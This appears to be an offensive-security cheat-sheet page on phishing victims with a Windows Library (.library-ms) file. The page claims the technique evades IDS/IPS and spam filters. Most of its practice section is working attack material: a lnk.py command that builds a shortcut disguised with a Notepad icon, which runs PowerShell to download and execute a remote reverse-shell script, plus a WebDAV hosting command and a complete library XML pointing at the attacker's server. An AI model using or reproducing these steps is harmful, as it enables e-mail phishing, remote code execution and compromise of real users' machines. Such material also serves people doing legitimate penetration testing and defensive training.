Windows Library Files
Theory
Windows Library files (.library-ms files) are a virtual container for user content. It can be used to point to a remote or local storage location.
We may send this file by e-mail and use social engineering to get the recipient to open the container (it will appear as a normal directory in Windows Explorer) and then to double-click on our hosted payload to execute it.
By delivering our payload via a Windows Library File rather than directly sending a link directly to a remote server hosting our payload, we may avoid IDS/IPS/Anti-spam solutions.
Practice
In this scenario, we'll create a .library-ms
file pointing to our WebDAV server that is hosting a malicious .lnk
file. The user will need to open both container and shortcut files to execute our payload.
First, let's create our malicious .lnk
shortcut using lnk.py (Python).
# -a : Arguments
# -i : Icon location
python2.7 lnk.py evil.lnk 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -a '-c "iex(iwr http://192.168.45.225/rev.ps1 -UseBasicParsing)"' -i 'C:\Windows\System32\Notepad.exe'
Then, start a WebDAV server to host our payload
# Install with: sudo apt install python3-wsgidav
wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .
We can now create our evil.library-ms
file with the following content
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://ATTACKING_IP</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
If you created this file on linux, we may need to change the text encoding as follow
unix2dos evil.library-ms
We can now send the evil.library-ms file to the target !
Resources
Last updated
Was this helpful?